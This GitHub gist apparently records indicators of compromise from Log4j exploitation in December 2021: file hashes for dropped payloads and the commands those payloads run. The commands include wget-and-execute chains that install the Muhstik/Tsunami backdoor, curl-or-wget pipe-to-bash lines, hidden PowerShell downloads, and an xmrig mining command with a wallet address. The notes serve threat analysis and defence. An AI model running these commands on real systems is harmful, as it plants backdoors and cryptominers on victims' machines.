Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Log4j Payload Dropped
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
wget -O /tmp/pty1; chmod +x /tmp/pty1; chmod 700 /tmp/pty1; /tmp/pty1 &
wget -O /tmp/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty5; chmod +x /tmp/pty5; chmod 700 /tmp/pty5; /tmp/pty5 &
pty3 4f34f8f156fdf12e0817a610344b11abdee87cfbed862bf91eb7685c63696898
--> download of Muhstik/Tsunami
(curl || wget -qO -|bash
(curl || wget -qO -|bash
(curl || wget -qO -|bash
m8 80faa26a8f697e16f72239936a4ef7863742c78dc2a997abaf3265cda51a5514
ldm 39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
--> uses curl on linux for download of
--> and uses powershell on Windows
(new-object System.Net.WebClient).Downloadfile('', 's.cmd')
s.cmd 8A009DEE6BFB6F79C0881F5D150EEAD92C93354D47FD1CB204791320D2151634
--> downloads xmrig
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('','xmrig.exe')
xmrig.exe -o -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
Copy link

hackinghippo commented Dec 15, 2021

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment